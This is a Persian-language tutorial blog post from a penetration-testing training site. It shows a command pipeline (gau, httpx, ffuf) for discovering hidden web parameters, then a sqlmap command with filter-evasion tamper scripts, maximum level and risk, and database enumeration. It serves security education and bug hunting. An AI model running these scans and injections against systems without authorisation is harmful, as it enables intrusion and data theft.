• صفحه اصلی
  • تامین امنیت سایت
  • آموزش جامع
    • کلوپ امنیت 1
    • کلوپ امنیت 2
    • کلوپ امنیت پیشرفته
    • دوره تست نفوذ api
    • دوره جامع osint
    • دوره متخصص pentest
    • دوره امنیت وردپرس
    • رایتاپخونه پلی برای کسب تجربه
    • دوره منتورینگ vip با بهروز منصوری
  • غیر رسمی
  • بلاگ
  • ارتباط با ما
 

ورود

رمز عبور را فراموش کرده اید؟

هنوز عضو نشده اید؟ عضویت در سایت
  • صفحه اصلی
  • تامین امنیت سایت
  • آموزش جامع
    • کلوپ امنیت 1
    • کلوپ امنیت 2
    • کلوپ امنیت پیشرفته
    • دوره تست نفوذ api
    • دوره جامع osint
    • دوره متخصص pentest
    • دوره امنیت وردپرس
    • رایتاپخونه پلی برای کسب تجربه
    • دوره منتورینگ vip با بهروز منصوری
  • غیر رسمی
  • بلاگ
  • ارتباط با ما
0

هنوز هیچ محصولی خریداری نکرده اید.

وبلاگ

مرزبان بلاگ مقالات آموزشی یافتن پارامترهای مخفی با Fuzzing

یافتن پارامترهای مخفی با Fuzzing

مقالات آموزشی ، وبلاگ
ارسال شده توسط بهروز منصوری
1402/08/09
353 بازدید

سلام.بهروز منصوری هستم و قراره در این مقاله یکی از روش های یافتن پارامترهای مخفی با Fuzzing رو بهتون آموزش بدم.

آموزش هک | آموزش امنیت | تست نفوذ

  • ابتدا url ها رو از طریق برنامه gau از ساب دامنه ها به دست میاریم.

cat subdomains.txt | gau –blacklist png,jpg,gif,jpeg,swf,woff,svg,pdf,tiff,tif,bmp,webp,ico,mp4,mov,js,css,eps,raw | tee all_urls.txt

  • به دنبال status code های 200 باشید

cat all_urls.txt | uro | httpx -mc 200 -silent | tee live_urls.txt

 

  • تمام endpoint های php را جدا کنید

cat live_urls.txt | grep “.php” | cut -f1 -d”?” | sed ‘s:/*$::’ | sort -u > php_endpoints_urls.txt

 

  • پارامترهایی که احتمالا مخفی هستند را با ffuf بررسی کنید
  • متد GET

for URL in $(<php_endpoints_urls.txt); do (ffuf -u “${URL}?FUZZ=1” -w params_list.txt -mc 200 -ac -sa -t 20 -or -od ffuf_hidden_params_sqli_injections); done

 

    • متد POST

for URL in $(<php_endpoints_urls.txt); do (ffuf -X POST -u “${URL}” -w params_list.txt -mc 200 -ac -sa -t 20 -or -od ffuf_hidden_params_sqli_injections -d “FUZZ=1”); done


یکی از آسیب پذیری هایی که در این مرحله پیشنهاد می شود که انجام دهید بررسی آسیب پذیری sql injection از طریق ابزار sqlmap است.

sqlmap -u “URL” –random-agent –tamper=”between,randomcase,space2comment” -v 2 –dbs –level 5 –risk 3 –batch –smart

 

پس متوجه شدیم که یافتن پارامترهای مخفی با Fuzzing می تواند شروعی برای تست آسیب پذیری های مختلف باشد.

اگر به مباحث هک و امنیت علاقه داری پیشنهاد میکنم حتماً در دوره کلوپ امنیت ۱ و کلوپ امنیت پیشرفته شرکت کنی.

در این دوره ها به صورت خصوصی و پروژه محور وب هکینگ رو بهت آموزش میدیم.

برچسب ها: ffuffuzzingParameters fuzzingsql injectionsqlmapآموزشآموزش هکبهروز منصوریترفندفاز پارامترهک سایت

قدیمی تر روش های یافتن ip اصلی سایت
جدیدتر روش های بایپس 403 Forbidden

محصولات فروش ویژه
  • چطور با گزارش خوب در سایت‌های داخلی کسب درآمد کنیم؟
    کسب درآمد از طریق گزارش باگ در سایت‌های داخلی
  • دوره درک عمیق آسیب‌پذیری
    درک عمیق آسیب‌پذیری
  • مینی دوره مهندسی اجتماعی
    مینی دوره مهندسی اجتماعی
  • گزارش نویسی حرفه ای در باگ هانتینگ
    گزارش نویسی حرفه‌ای در Bug Hunting
دسته‌ها
  • رایتاپ
  • غیر رسمی
  • مقالات آموزشی
  • وبلاگ
  • ویدیوهای آموزشی
درباره ما

هدف از راه‌اندازی این سایت تلاش در جهت ورود شما به بازار کار است.افراد زیادی را میشناسیم که مشغول کارهای کارمندی هستند، شاید حتی پول نسبتا خوبی هم به دست میاورند ولی از کارشان لذت نمیبرند.

هدف ما اینجا این است که شما از کاری که علاقه‌ دارید و از انجام دادنش لذت می‌برید به صورت قانونی پول در بیاورید و نکته مهم اینجاست که حوزه هک و امنیت یک حوزه پولساز است به شرط این که راه درست را انتخاب کنید و از مسیر درست به دنبال نتیجه گرفتن باشید.

دسترسی سریع
  • دوره منتورینگ vip بهروز منصوری
  • کلوپ امنیت 1
  • کلوپ امنیت 2
  • کلوپ امنیت پیشرفته
  • دوره تست نفوذ api
  • دوره جامع اوسینت
  • دوره امنیت وردپرس
  • دوره متخصص pentest
  • رایتاپخونه
  • ارتباط با ما
  • تماس: 09126216410
  • ایمیل: mr.mansoori@yahoo.com

تمامی حقوق برای مرزبان محفوظ می باشد.

طراحی توسط مرزبان

در صورت نیاز به مشاوره می توانید فرم را تکمیل نمایید و یا با ما در ارتباط باشید.

جستجو

جستجو با زدن Enter و بستن با زدن ESC